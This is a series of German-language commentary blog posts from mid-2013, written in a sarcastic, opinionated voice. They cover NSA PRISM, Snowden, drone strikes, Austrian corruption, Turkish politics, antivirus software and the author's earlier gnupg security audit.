[l] In Österreich gibt es gerade eine einzigartige Chance, dass mal ein bisschen Licht auf die hässliche Fratze der Korruption fällt. Und zwar haben sie einem Telekom Austria Manager das Haus durchsucht, und der hatte sich auf solche Eventualitäten vorbereitet, indem er eine "Lebensversicherung"-Liste mit Verfehlungen der Telekom Austria gemacht hat. Die wurde dann gefunden und jetzt kommt er als erster in den Genuss der neuen Kronzeugenregelung in Österreich. Und was er da so ausgepackt hat, das hat es in der Tat in sich.
Fast kein Tag sei vergangen, an dem nicht aus einem öffentlichen oder halböffentlichen, politischen Bereich Anfragen nach finanziellen Zuwendungen oder gezielter Protektion gekommen seien. Die TA-Manager hätten so ihre Netzwerke gepflegt: "Wenn jemand etwas gebraucht hat, hat er es bekommen, damit andere Rahmenbedingungen wieder so waren, dass das Unternehmen mehr Gewinn macht."

Thu Jul 4 2013

[l] Hier kommt noch eine schöne Verschwörungstheorie rein gerade: Morales hat Snowden nach Österreich geschmuggelt, und damit das nicht so aussieht, haben sie diesen Notlandezirkus gemacht. :-)

Wed Jul 3 2013

[l] Hey, ein Glück, dass wir in Deutschland einen Rechtsstaat haben. Da sind Dinge wie hier beschrieben völ-lig un-denk-bar!
Die Verteidiger Zschäpes halten das Gespräch des BKA-Mannes mit Zschäpe für nicht verwertbar - wegen "verbotener Vernehmungsmethoden", wie Anwältin Sturm nach der Aussage des Beamten sagte. Es habe sich "eindeutig um eine Vernehmung im strafprozessualen Sinne" gehandelt. Zschäpe sei darüber getäuscht worden, dass gezielt eine Vernehmung stattgefunden habe, getarnt als informatorisches Gespräch.
Die haben die Zschäpe 8 Stunden lang durch die Gegend gefahren, und dann "Smalltalk" gemacht, der sich im Wesentlichen um ein Geständnis von ihr bemühte und Details herauszufinden versuchte.

Fri Jun 28 2013

[l] Bug des Tages: MySQL bug 20786. Warum ausgerechnet der? Weil jemand auf Youtube einen Geburtstagskuchen für den Bug gemacht hat :-)

Wed Jun 26 2013

[l] Die Bundeswehr will für 800 Millionen Spionagesatelliten ins All schießen. Währenddessen hat es sich die deutsche Presse im Dickdarm der USA bequem gemacht. Der absolute Brüller ist aber, dass der Bosbach schnell die Seite gewechselt hat und jetzt plötzlich ein glühender Verfechter von Menschenrechten und ein Bekämpfer des Überwachungsstaates ist — solange jemand anderes am Ruder ist.
Oh übrigens, nachdem sich schon die "die Chinesen hacken immer alles"-Geschichte ins Gegenteil umgekehrt hat, weil wir jetzt wissen, dass in Wirklichkeit die Amis immer alles hacken, hat Google mal ihre Malware-Statistik veröffentlicht, und siehe da, auch die ganze Malware wird in den USA gehostet, nicht in China. Na sowas.
Ich sage euch, wenn sich mal jemand anschaut, welches Land schlimmer die Umwelt verpestet, China oder die USA, dann gibt es die nächste "Überraschung".

Mon Jun 24 2013

[l] Amnesty International weist darauf hin, dass es eine Menschenrechtsverletzung ist, dass die USA Snowdens Pass ungültig gemacht haben.
Besides filing charges against Snowden, the U.S. authorities have revoked his passport, which Amnesty International said interferes with his rights to freedom of movement and to seek asylum elsewhere. The organization also noted that an individual cannot be extradited while they have an asylum claim underway in any country.

Fri Jun 21 2013

[l] Herbert Snorrason hat von Google die ihn betreffenden Warrants gemailt gekriegt. Als PDF. Teilweise geschwärzt. Von dem zweiten nur die erste Seite. Der Umfang der abgerufenen Daten ist ungefähr genau so, wie wir Zyniker uns das immer vorgestellt haben.
1. The contents of all e-mails associated with the account, including stored or preserved copies of e-mails sent to and from the account, draft e-mails, deleted e-mails, emails preserved pursuant to a request made under 18 U.S.C. § 2703(f), the source and destination addresses associated with each e-mail, the date and time at which each e-mail was sent, and the size and length of each e-mail;
2. All records or other information regarding the identification of the account, to include full name, physical address, telephone numbers and other identifiers, records of session times and durations, the date on which the account was created, the length of service, the types of service utilized, the IP address used to register the account, log-in IP addresses associated with session times and dates, account status, alternative e-mail addresses provided during registration, methods of connecting, log files, and means and source of payment (including any credit or bank account number);
3. All records or other information stored at any time by an individual using the account, including address books, contact and buddy lists, calendar data, pictures, and files, and including any deleted information and any information preserved pursuant to a request made under 18 U.S.C. § 2703(f);
Und da endet das zweite PDF. Mit einem Semikolon. Herbert vermutet, dass sie auf der nächsten Seite auch seine Chat-Transkripte abgeschnorchelt haben. Herbert hat sich in dem Wikileaks-Umfeld bewegt und hat eh schon die ganze Zeit damit gerechnet, dass die seine Daten komplett abschnorcheln. So ist er auch inhaltlich nicht sonderlich überrascht. Aber es ist schon nochmal was anderes, das jetzt schwarz auf weiß zu haben.
[l] Was passiert, wenn ein an der Klagemauer betender Jude plötzlich unversehens "Allahu Akbar" ruft? Er wird für ein islamistischer Terrorist gehalten und erschossen. Die Sicherheitskräfte sagen, er sei auf sie zugestürmt. Das CCTV-Material ist wohl noch nicht gesichtet worden.

Thu Jun 20 2013

[l] Gute Nachrichten aus Griechenland: Das oberste Verwaltungsgericht hat die Schließung der öffentlich-rechtlichen Rundfunkanstalt ERT rückgängig gemacht.

Fri Jun 14 2013

[l] Hey, habt ihr das verfolgt mit Syrien? Wo dieser fiese, nicht demokratisch legitimierte Diktator die Bevölkerung unterdrückt? Und nur eine Randgruppe von tapferen Helden sich für den Rest der Bevölkerung auflehnt, um Demokratie und Gerechtigkeit für alle zu erkämpfen? Ja?
Nun, äh, die NATO hat da mal eine Umfrage in Syrien gemacht. Das ist ja immer ganz hilfreich, wenn man mal die Bevölkerung vor Ort fragt. Ergebnis:
The data, relayed to NATO over the last month, asserted that 70 percent of Syrians support the Assad regime. Another 20 percent were deemed neutral and the remaining 10 percent expressed support for the rebels.
Mit anderen Worten: Assad ist deutlich stärker demokratisch legitimiert als Obama. Die Rebellen werden von der Bevölkerung auch nicht als Rebellen bezeichnet, sondern als Jihadisten.
“The people are sick of the war and hate the jihadists more than Assad,”a Western source familiar with the data said. “Assad is winning the war mostly because the people are cooperating with him against the rebels.”
Ach nee. Das ist dann ja eine TOLLE Idee, den Rebellen Waffen zu liefern!1!! (Danke, Sebastian)
[l] Der Eröffnungsschuss der Drohnenkriege ist gefallen: Türkische Polizei schießt Drohne ab. Und hier ist das Video, das die Drohne vorher geschossen hat. Leider hat der Einschlag der Kugeln die letzten Minuten kaputtgemacht, so dass man nicht von der Drohne aus den Abschuss sieht.
Apropos Türkei: Es gab da noch eine rührende Szene, bei der ein deutscher Pianist aus Italien zusammen mit einem türkischen Musiker ein spontanes Konzert auf dem Platz gegeben hat, praktisch zwischen den Tränengasschwaden. Das Konzert hat die Lage wohl deutlich deeskaliert.
[l] Dass die Amis Versuche mit Hellsehern gemacht haben, um sie im Krieg einzusetzen, ist ja hinlänglich bekannt, auch dass sie Ziegen durch bestarren zu töten versucht haben. Von den Russen hörte man auch teilweise komische Gerüchte. Jetzt kommt raus, dass auch die Israelis in die Richtung geforscht haben. Die Amis haben Geller u.a. gebeten, mal testweise bei einem Schwein von außen das Herz stehen lassen zu können. Geller hat abgelehnt, denn falls das funktioniert hätte, sagt er, wäre der nächste Test bestimmt ein Mensch gewesen. m(
[l] Jetzt kommen sie plötzlich alle aus ihren Löchern. Die NSA tauscht auch häufig nicht personenbezogene Daten mit Firmen. Der Artikel ist nicht so konkret, um was für Daten es sich handeln, daher: Gemeint ist sowas wie der Quellcode von Software, und technische Detail-Specs, wie Dinge funktionieren. Dinge, die man sonst als Trade Secret behandelt. Das ist auch keinesfalls auf die USA beschränkt. Auch andere Regierungen gehen auf Firmen wie Microsoft und Apple zu und verlangen Einblick in deren Quellcode. Inwieweit der dann auch gewährt wird, hängt vermutlich von der Leidensfähigkeit und Kompetenz der Rechtsabteilung ab. Da man aber bei Microsoft sogar als Uni den Quellcode des Kernels für Forschungszwecke kriegen kann, kann man davon ausgehen, dass der einmal die Runde gemacht hat. In Deutschland wäre der offizielle Ansprechpartner vermutlich sowas wie das BSI, nicht der BND. Damit das wenigstens ein bisschen so aussieht, als habe es legitime Hintergründe und ginge nicht um Cyberwar.
Auch das ist alles seit Jahrzehnten bekannt oder wird laut gemunkelt. Wirklich wissen tut man sowas natürlich nur in den seltensten Fällen. Aber in der Praxis gehe ich zumindest im Umgang mit Software aus den USA immer davon aus, dass da alle möglichen Dienste mal reingeguckt und nach 0day gesucht haben. Bei freier Software weiß man wenigstens, dass auch andere mal reingeguckt haben :-)
Update: Auch 0days werden laut Artikel rausgerückt, aber das bringt den Diensten weniger als den Quellcode rauszurücken. Denn das ist halt nur die Lücke, nicht der Exploit, und wenn man das von Microsoft kriegt, dann weiß man ja auch, dass die gerade dabei sind, das zu fixen. Daher gibt es nur ein sehr begrenztes Zeitfenster, in dem das tatsächlich ein 0day ist. Diese Vorab-Info über Sicherheitslücken an Regierungen ist übrigens auch seit Jahren bekannt.

Thu Jun 13 2013

[l] Neulich ging die Geschichte herum, dass Obama in seinem Drohnenkrieg einen 16-Jährigen umgebracht hat. Ich sage Obama hat ihn umgebracht, weil Obama persönlich alle Drohnenschläge abzeichnet. Nicht pauschal alle zusammen. Jeden einzelnen. Und zwar immer Dienstags, am Terror Tuesday. Der Teenager war deswegen eine Story, weil der US-Bürger war. Ein Amerikaner. Obama hat einen Amerikaner umbringen lassen. Auf die ganzen Nicht-Amerikaner, die Obama so umbringen lässt, scheißt die US-Öffentlichkeit, aber wenn Amerikaner hinterhältig per Drohne ermordet werden, dann horcht der eine oder andere auf. Wieso wurde der überhaupt umgebracht? Weil er der Sohn von einem Imam aus den USA war, einem Mann namens Anwar al-Awlaki. Der hat sich irgendwann ins Ausland abgesetzt und anti-amerikanische Radiosendungen gemacht. Völlig klar, so jemanden muss man umbringen!1!!
Nun stellt sich natürlich die Frage, wieso man auch seinen Sohn umbringen musste. Der Pressesprecher des Weißen Hauses ließ das in der Antwort so klingen, als sei der halt beim Anschlag auf den Vater zu nahe dran gewesen. Kollateralschaden, *schulterzuck*, das passiert halt schon mal.
Was hat der Sohn denn falsch gemacht, wollte noch jemand wissen. Antwort:
"I would suggest that you should have a far more responsible father if they are truly concerned about the well being of their children. I don't think becoming an al Qaeda jihadist terrorist is the best way to go about doing your business," Gibbs, the former White House press secretary, told the interviewer from We Are Change, when asked to justify "an American citizen that is being targeted without due process, without trial — and, he's underage, he's a minor."
Aber nein, wie Greg Palast jetzt schreibt, war das ganz anders:
Holder's comment makes it seem that Awlaki's son was blown up with him—a sad case of ‘collateral damage.'
But are you ready for this? The teenager—along with his cousin and friends—was killed two weeks after and hundreds of miles away from the site where rockets killed his father.
Außerdem stimmt es wohl nicht, dass die Amis dort nur mit Drohnen herummorden. Der Artikel beschreibt einen Cruise-Missile-Einschlag im Jemen, zu dem sich dann der jemenitische Präsident stolz bekannte, aber vor Ort fand man die Trümmer von einer US-Cruise-Missile. Ein Reporter aus Jemen ging hin, fotografierte das, und wurde prompt dafür in den Knast geworfen. Obamas persönliche Intervention hat dann dafür gesorgt, dass der Präsident den Fotografen nicht begnadigte, weil er kalte Füße bekam. Und da ist der Artikel noch nicht zuende. Lest selbst.

Wed Jun 12 2013

[l] Ich bin gerade dabei, meine Einstellung zu Antiviren zu ändern. Ich hab die ja seit Jahren verteufelt. Aber ich hatte gestern ein Schlüsselerrlebnis. Und zwar saß ich bim Kunden an einem PC und sollte einen Bericht schreiben. Ich hatte da Windows 8 mit Office 2013 am Start. Und das war geradezu grotesk flink! Das flutschte alles nur so! Gefühlt eine Größenordnung schneller als Libreoffice / OpenOffice und auch als Textmaker Office, das ich sonst gelegentlich verwende. Und da fiel es mir wie Schuppen von den Augen.
Java hat uns den RAM billig gemacht. Computerspiele haben uns Grafikkarten schnell und billig gemacht. Pornographie hat uns Internet schnell und billig gemacht. Und Antiviren machen uns die Rechner schnell und billig. Ich saß da an einem Arbeitsplatzrechner, der vom Kunden zur Verfügung gestellt wurde. Da lief natürlich auch ein Antivirus drauf. Und ich habe da, weil ich ja nichts neues starte oder runterlade, die ganzen Komponenten deaktiviert, die normalerweise so nebenbei mitlaufen, und alle Dateien scannen, die von irgendeinem Prozess geöffnet werden. Stellt sich raus: DAS war es, wieso Office bei mir so flutschte. Bei meinem Nachbarn schnarchte das wie gewohnt vor sich hin. Der hatte das nicht ausgeschaltet.
In diesem Sinne: Antiviren sind natürlich immer noch Schlangenöl und machen die Menschen unsicherer statt sicherer, aber wir sollten ihnen trotzdem dankbar sein, weil sie dafür gesorgt haben, dass andere Software schneller wird, weil es sonst überhaupt nicht ertragbar wäre.
Ich würde sogar so weit gehen, für Linux Antiviren zu fordern. Das ist ein echter Wettbewerbsnachteil, den Linux-Softwareentwicklung da hat. Die Entwickler sehen keinen Optimierungsbedarf, weil das bei ihnen flutscht. Wenn man nicht gerade Old School seine Dokumente mit TeX oder troff schreibt, ist der Performance-Zustand der Office-Suiten unter Unix geradezu beschämend. Und die ganzen Sprallos von Freedesktop und co kommen ja auch jedes Jahr mit weiteren Indirektionsschichten mit XML und endloser Redundanz, weil sie es können! Wenn da noch ein paar Antiviren das System auf C64-Niveau verlangsamen würden, dann würden diese Leute effizienteren Code schreiben.
[l] Ein US-Gericht hat jetzt einen Chinesen zu 12 Jahren Knast wegen Verkaufs von Raubkopien verurteilt. Der Knackpunkt an der Sache ist, dass der Mann in China wohnt und alle Verkäufe von dort aus gemacht hat. Wie kam es dann überhaupt zu einem Gerichtsverfahren in den USA? Sie haben ihn geheimdienstlich rausgelockt.
Li was arrested by federal agents in June 2011 in Saipan, an island about 120 miles (193 kilometers) northeast of Guam in the western Pacific Ocean, according to court filings.
Li agreed to travel there from his home in southwest China to deliver pirated software and 20 gigabytes of proprietary data from a U.S. software company to undercover agents posing as businessmen, according court filings.
Der Mann war offensichtlich auch ein echt großer Fisch, hier ist von 100 Millionen Dollar Schaden die Rede. Selbst wenn man da ein paar Nullen Antipiraterie-Übertreibung streicht, ist das noch eine Menge Holz.

Tue Jun 11 2013

[l] Der neue oberste Strahlenschützer der EU kommt aus Deutschland. Was hat er dort gemacht? Nun, …
Dieser Abteilungsleiter heißt Gerald Hennenhöfer, ist zuständig für die Sicherheit deutscher Atomreaktoren und bekannt für seine mehrfachen Seitenwechsel: Atomaufsicht, Atomkonzern, Atomaufsicht.
[l] Der luxemburgische Geheimdienst überwachte die Ermittler in der Bombenleger-Affäre, und auch den zuständigen Staatsanwalt. Und als der dann mal Thailand-Urlaub gemacht hat, haben sie Pädophilie-Gerüchte über ihn zusammengetragen. Da hat ein ganzes Team dran gearbeitet und sie haben sogar 14000 Euro an Informanten gezahlt. Der Geheimdienstchef ist danach übrigens Sicherheitschef von Siemens geworden. Und der damalige Justizminister hat unbotmäßig Einfluss genommen. Wer hat Luxemburg eigentlich in die EU gelassen? (Danke, Patrick)
[l] Weil das gerade die Runde macht: Ich habe vor ein paar Jahren mal gnupg auditiert. Werner Koch hat damals als Softwaremaintainer auf ganzer Linie verkackt und meine Bugreports nicht haben wollen, also habe ich ein privates Diff gemacht und online gestellt. Soviel Stand von 2007 oder so.
Über die Jahre habe ich dann beim Anpassen von meinem diff auf neuere Versionen von gnupg gesehen, dass inzwischen knapp die Hälfte der Bugs in meinem Patch insgeheim upstream gefixt wurden. Es bleiben natürlich immer Restzweifel, aber die Bugs, die relativ sicher zu Problemen hätten führen können, sind in der Zwischenzeit verschwunden. Meine Ansage von damals, dass gnupg ein unsicherer Haufen Mist ist, gilt daher heute nicht mehr. Hintertüren habe ich damals übrigens keine gefunden, das sah alles aus wie ganz normale Schludrigkeit und Inkompetenz. Restzweifel bestehen natürlich immer. Und ich kann natürlich auch was übersehen haben. Insofern: Im Zweifelsfall selber nochmal gucken.
Update: Ich sollte dazu sagen, dass ich von den Sourcen von gnupg selbst rede, und auch nur von der 1.x-Version. Den ganzen Smartcard-Kram und etwaige Frontends habe ich nicht geprüft und habe es auch nicht vor. Und in den verwendeten Libraries können natürlich auch noch Fehler sein. Von "ist sicher" kann ja eh nie die Rede sein, so auch nicht in diesem Fall. Aber ich für schätze für mich das Risiko überschaubar genug ein, von einem Einsatz nicht mehr pauschal abzuraten.

Sun Jun 9 2013

[l] Der für PRISM zuständige Funktionär hat gesagt, dass das gar kein Massenschnorchel sei sondern nur ein API, über das sie völlig legale und legitime, vom unabhängigen Gericht bestätigte Anfragen an die ISPs weiterleiten. Die ISPs hätten dann also immer noch am Ende einen Blick darauf, was die NSA haben will.
Aber so harmlos, wie die es da klingen lassen, ist es nicht.
Erstens sind das keine Anfragen nach einem Telefonat, von einer Person, oder allen Telefonaten von einer Person, sondern das kann Muster und Regeln haben und am Ende ist dann doch unklar viel betroffen. Zweitens können die Firmen das natürlich nicht ablehnen, wenn das von einem Richter unterschrieben wurde, denn das entspricht ja tatsächlich der Gesetzeslage, auch wenn man die Gesetze jetzt illegitim und verwerflich finden mag. Drittens dürfen die Firmen auch nicht den Betroffenen Bescheid sagen oder auch nur Statistiken veröffentlichen. Mit anderen Worten: Das kann immer noch alles genau so schlimm sein wie es von Anfang an aussah. Das ist jetzt halt Schadensbegrenzungs-Spindoktoring. Wie immer von Obama. Große Worte. Und die Taten gehen dann in die Gegenrichtung. Der war ja schon immer gut darin, die Leute mit seinen Aussagen irrezuführen. Er hat ja nicht angesagt, dass er warrantless wiretapping abschafft, sondern dass er illegal warrantless wiretapping abschafft. Die Leute hörten: der schafft warrantless wiretapping ab. Tatsächlich hat er das einfach legal gemacht, damit ist die Aussage aus formaljuristischer Winkeladvokatsperspektive auch jedenfalls nicht gänzlich unwahr.
Update: Oh und der Guardian legt nach mit einer weiteren NSA-Folie. Die ist schon ziemlich eindeutig und sagt, dass die NSA nicht nur direkt die Daten von den Servern einsammelt ("Collection directly from the servers" ist schon echt schwierig wegzuspindoktorn. Das will ich mal sehen, wie Obamas Schergen das machen), sondern auch die Glasfasern komplett abgreift. Das ist auch nicht weiter neu oder überraschend, wenn man nicht gerade die letzten Jahrzehnte im Winterschlaf verbracht hat. Aber bei den Glasfasern kriegt man halt nur den verschlüsselten Traffic, daher PRISM. Damit Sie auch morgen noch kraftvoll abschnorcheln können.
Das Liveblog beim Guardian ist überhaupt ganz großes Popcornkino. Obamas National Security Pressefuzzy hat auf Twitter herumgefurzt, wenn man bei Wikileaks den Manning verfolge, wieso denn die Leute dann beim Ausleiten von "US national security information to a foreign news outlet" sich nicht größere Sorgen machen. Woraufhin der Guardian nicht nur erklärt, dass sie auch eine US-Niederlassung haben und der NSA bei allen Dokumenten, die sie zu veröffentlichen planen, Gelegenheit zum äußern von konkreten Bedenken zur nationalen Sicherheit gegeben haben. Und noch einen Scoop haben sie: sie haben mal geguckt, wo eigentlich so die Daten herkommen, die die NSA da so auswertet. Die Farbskala geht von grün für wenig Daten über Orange für viele Daten bis Rot für sehr viele Daten. Man sieht, dass da der Großteil der Welt grün ist. Rot sind Iran und Pakistan, Orange sind Ägypten und Indien, Russland, Libyen und Syrien (!?) sind grün, und als einzgie in Europa orange ist … Deutschland! Auch orange sind die USA. Der NSA ist explizit verboten, US-Bürger zu überwachen. Das ist ein ziemlicher Kracher.
[l] Sagt euch Sellafield was? Das ist ein Dorf im Nordwesten Englands, in dem die Briten ihr Atomprogramm gestartet haben. Da standen die sogenannten Windscale Piles, ein Plutonium-Produktionszentrum mit einem Graphit-Kern. Das lief auch ganz gut, bis es einen Brand gab. Dazu hatte ich mal eine BBC-Dokumentation verlinkt, die noch online ist. Sellafield war schon häufiger in diesem Blog. Es gibt da die Anekdote, dass die Briten ihr Atomzentrum von Windscale nach Sellafield umbenannt haben, damit sich die ausgetretene Strahlung der späteren Unfälle nicht zu der ausgetretenen Strahlung von 1957 addiert und so einen hässlichen Peak gibt.
Jedenfalls, warum ich das jetzt erwähne: Die Briten sitzen aus historischen Gründen auf einem Haufen Plutonium, das sie jetzt gerne mal zivil einsetzen würden. Der Weg, wie man das tut, ist dass man das in Uran untermengt. Wikipedia erklärt das hier. Und wie immer bei solchen Großprojekten haben sie von Anfang an alles nach Strich und Faden verkackt. Die Installation hat 1993 die Zulassung gekriegt, und sollte 280 Millionen Pfund kosten. "Fertig" war es 1997, aber konnte erst 2001 die Produktion aufnehmen. 2011 wurde das dann runtergefahren, nachdem die Kosten auf 1,4 Milliarden explodiert waren. Wenn man da noch die Rückbaukosten in Betracht zieht, kommt man auf 2,2 Milliarden Pfund.
In den Planungsunterlagen hieß es noch optimistisch, das Ding würde Profit abwerfen. Davon ist weit und breit nichts zu sehen. Der Plan sah 120 Tonnen MOX-Brennstäbe pro Jahr vor, die man dann ins Ausland hätte verkaufen können. Tatsächlich haben die aber nur insgesamt 14 Tonnen in den 10 Jahren Betrieb produziert.
Die Misere ging damit los, dass der Eigentümer-Konzern es nicht geschafft hat, von Siemens das Knowhow einzukaufen. Also haben sie es dann halt ohne Knowhow gemacht.
"When the Siemens acquisition was abandoned, BNFL proceeded with SMP nevertheless and relied on its relatively limited in-house expertise," the report declared. "As a result, SMP had very significant gaps both in its design and operating capability."
Und der Kracher an der ganzen Saga? Nach all dem Verkacken erklärte der Energieminister im Dezember überraschend, dass er das Plutonium in Sellafield doch noch in MOX umwandeln will. Klar, aus Fehlern lernen ist total überbewertet. Da geht doch der ganze Spaß am Leben verloren!1!!
[l] Ecuador ruft die Botschafterin aus England zurück, weil sie Julian Assange nicht aus der Botschaft kriegt. Das Problem ist, dass sich da jetzt ein Equilibrium eingestellt hat, mit dem jeder außer Ecuador gut leben kann, und für Ecuador überwiegen die Nachteile eines Rauswurfs die Vorteile. Noch. Insbesondere für die Briten ist das perfekt so. So wird Julian nicht ausgeliefert, d.h. die Briten haben sich nicht weiter die Hände schmutzig gemacht in der Sache, und ob der jetzt ausgewiesen wird oder nicht ist den Briten ja im Wesentlichen egal, solange sie zeigen können, dass sie aus ihrer Sicht alles getan haben.
Ecuador is understood to be desperate to negotiate a way for Mr Assange to quit its embassy amicably and is growing frustrated with the lack of progress. Quito sources said they believe Britain is happy to leave Mr Assange marooned.

Fri Jun 7 2013

[l] Oh, ich sehe gerade, heute wird wieder so ein Popcorn-Tag. Aktueller Schenkelklopfer: "Die Bundesregierung prüft, ob von der angeblichen Überwachung von Internet-Diensten durch den US-Geheimdienst auch deutsche Nutzer betroffen sind."
HAHAHAHAHAHAHA, was für Vollpfosten! Sogar das EU-Parlament hat das schon festgestellt! Was kommt jetzt, Ilse Aigner kündigt ihren NSA-Account? Für wie blöde halten die uns eigentlich?
Oh übrigens, falls das noch nicht jedem klar war, wieso Europäische Regierungen solche Programme nicht nur gutheißen sondern noch fördern: Das konnte man bei der SWIFT-Affäre gut sehen. Die haben schlicht einen Deal mit den Amis gemacht. Die Amis kriegen unsere Daten, auf Zuruf kriegen die Europäer Auswertungen der Daten von den Amis, und dafür sind und bleiben die Amis die Alleinschuldigen, wenn es auffliegt. Und kein EU-Land hat sich die Finger schmutzig gemacht. So können wir weiter schön von Datenschutz und Privatsphäre herumheucheln. Auch bei diesem PRISM-Programm haben die Briten mitgeschnorchelt. So läuft das jedesmal. Und dann lügen sie uns ins Gesicht, sie hätten ja keine Ahnung gehabt, dass unsere Freunde in Amerika unsere Daten so missbrauchen würden!1!!
In Amerika war sowas noch nie ein Problem. Da stellt sich dann ernsthaft der Geheimdienstdirektor hin, nennt es verwerflich, dass das Programm öffentlich gemacht wurde, das gefährde die nationale Sicherheit, dann verfolgt man die Whistleblower und alles geht weiter wie vorher.
[l] Ach nee, JETZT hat die Washington Post auch ein fettes Expose über das NSA-Vorratsdatenspeicherungs-Programm. Nachdem der Guardian die Geschichte publik gemacht hat. Die haben da offensichtlich schon eine Weile drauf gesessen und publizieren das jetzt nur, weil es eh publik ist. Freie Presse, my ass. Schaut nur, wie viel mehr Details die haben als der Guardian!
The National Security Agency and the FBI are tapping directly into the central servers of nine leading U.S. Internet companies, extracting audio, video, photographs, e-mails, documents and connection logs that enable analysts to track a person’s movements and contacts over time.
Und sie haben eine Liste der Teilnehmer:
They are listed on a roster that bears their logos in order of entry into the program: “Microsoft, Yahoo, Google, Facebook, PalTalk, AOL, Skype, YouTube, Apple.” PalTalk, although much smaller, has hosted significant traffic during the Arab Spring and in the ongoing Syrian civil war.
Dropbox , the cloud storage and synchronization service, is described as “coming soon.”

Tue Jun 4 2013

[l] Mir gehen gerade einige echt interessante Emails über die Türkei zu. Einige Details findet man auch hier. Ich gebe das hier mal wieder, ohne es groß prüfen zu können. Insofern recherchiert bitte auch selber.
Erstmal: Erdogan will gerne Präsident werden. Das gibt die Verfassung der Türkei nicht her. Zum Ändern der Verfassung fehlt ihm die Mehrheit, obwohl die Türkei eine (umstrittene) 10%-Klausel hat, und die Erdogan-Partei AKP daher im Parlament überrepräsentiert ist. Also hat er einen Kuhhandel mit den Kurden gemacht. Die Kurden (ausgerechnet!) helfen ihm, Präsident zu werden, und dafür bombardiert die Türkei dann nicht mehr im Wochenrhythmus kurdische Dörfer. Wer sich also fragte, wieso Erdogan plötzlich mit den Kurden kuschelt: da habt ihr es.
Es gibt noch weitergehende Kuhhändel, z.B. ist die Rede davon, Kurdisch als Amtssprache zuzulassen. Aber Erdogan ist ein Schlitzohr, der schon häufiger bei solchen Deals dann am Ende die Gegenseite verarscht hat, und so rechnen alle damit, dass in den Ämtern dann halt niemand sitzen wird, der kurdisch spricht. So ist das zwar offiziell Amtssprache, aber man hat nichts davon als Kurde.
Letztlich muss mal wohl auch die Möglichkeit in Betracht ziehen, dass die Bombardierung wieder losgeht, wenn Erdogan sein Ziel erreicht hat und Präsident ist.
Erdogan steht für die Islamisierung der Türkei. Die Geschichte der Türkei ist ja in der Beziehung sehr spannend, weil Staatsgründer Mustafa Kemal Atatürk bei der Staatsgründung explizit auf einen laizistischen Staat Wert legte. Die Armee sollte das sicherstellen. Und so gibt es seit Erdogans Amtsantritt Spannungen zwischen Erdogans Islamisierung und der Armee. Im Grunde warten alle laizistischen Kräfte darauf, dass die Armee einschreitet und Erdogan entfernt, aber Erdogan hat noch nicht genug Vorwand geliefert bisher. Daher waren diese Straßenschlachten so spannend gerade, das hätte an sich als Vorwand ausreichen können.
Erdogan steht zwar für den Islam, aber nicht für den traditionellen Islam, eher für progressiven Islam. Eine verbreitete Theorie in der Türkei ist daher, dass Erdogan eine CIA-Marionette ist, die auf der einen Seite die Türkei als modernen westlichen Staat etablieren und an die EU heranführen soll, auf der anderen Seite aber auch durchaus offen den Islam vertreten soll, sozusagen als Wink mit dem Zaunpfahl in Richtung des Nahen Ostens: Schaut her, Islam und westliche Orientierung geht zusammen. Als wichtige Figur wird dabei oft Fetullah Gülen gesehen, der in den USA im Exil wohnt, aber großen Einfluss hat.
Erdogan ist durchaus demonstrativ pro-islamisch, baut mehr Moscheen als Schulen, obwohl das Schulsystem weitgehend im Eimer zu sein scheint. Man hört da Geschichten von 60 Schülern in einer Klasse und dass alle Schüler nach der Schule nochmal in eine private "Nachhilfe"-Schule gehen, wo sie den Stoff dann mit weniger Schülern pro Lehrer vermittelt kriegen. Das kostet dann natürlich richtig Geld. Ich zitiere mal aus einer Mail dazu:
Parallel zu der wachsenden Zahl der Moscheen wurde vor kurzem beschlossen, die religiösen Imamschulen ab der 5. statt wie früher ab der 10. Klasse als offizielle Bildungseinrichtungen zuzulassen (Erdogan war selbst auf so einer religiösen Schule). D.h. Eltern können die Schulpflicht inzwischen mit einer Koranschule erfüllen. Gerade in den östlichen Gebieten ist die Anzahl der nicht zur Schule gehenden Mädchen sehr hoch, die Antwort der Regierung war: sie hat den Fernunterricht ab der 5. Klasse ermöglicht. Wie realistisch das ist, kann man sich denken.
Der Islam und eine recht offene nationalistische Politik halten dann auch gerne als Begründung für Maßnahmen wie weitgehende Internetzensur (Der Youtube-Bann hat es ja bis zu uns in die Presse geschafft) her, oder die Privatisierung der Opern und Theater (es sei zu wenig türkisches Programm zu sehen), oder für das Alkoholausschankverbot. Hier muss man sehen, dass die Hälfte der Bevölkerung des Landes unter 30 Jahre alt sind. Die Türkei ist demographisch ein sehr junges Land und wächst beständig. Atatürk hatte die Theater und Opern extra so eingerichtet (und die sind bis heute stark subventioniert), um die Türkei kulturell an Europa anzunähern.
So richtig einfach ist die Lage jedenfalls nicht. Insbesondere haben sowohl Erdogan und seine Anhänger als auch die Kemalisten auf der anderen Seite deutliche nationalistische Tendenzen. Wie da überhaupt an einen EU-Beitritt zu denken ist, wo die Türkei dann Teile ihrer Souveränität aufgeben müsste, erschließt sich mir nicht.
Ein weiteres Indiz für die Erdogan-USA-Connection ist auch, dass Erdogans Wirtschaftspolitik im Wesentlichen aus Neocon-Dogmen wie Privatisierung und Freihandels-Blablah besteht.
[l] Die ARD hat eine Reportage über Gustl Mollath gemacht. Schnell gucken, bevor sie "depubliziert" wird. (Über Mollath in diesem Blog)

Thu May 30 2013

[l] Wie wertlos sind Antiviren? Hier hat mal jemand ein schönes Experiment gemacht. Der hat Systemdateien von verschiedenen Windows-Versionen genommen, mit irgendwelchen EXE-Packern komprimiert, und dann bei Virustotal hochgeladen. Ergebnis: Fast 70% werden als Malware "erkannt".

Thu May 23 2013

[l] Das mit Apple und der Senatsanhörung neulich habt ihr ja sicher mitgekriegt. Dachtet ihr auch, da ginge es um Steuern? Haha, reingefallen! Hier erklärt das mal ein Washington-Insider. Ich zitiere mal die wichtige Erkenntnis:
Senators are angry that tech giant Apple isn't paying its fair share.
I'm not talking about taxes. This is about campaign contributions and lobbying fees.
Schöne Firma haben Sie da! Wäre ja zu schade, wenn der was zustöße!
Es gibt da so ein schönes Zitat von Mark Twain, das es schön auf den Punkt bringt.
It could probably be shown by facts and figures that there is no distinctly native American criminal class except Congress.
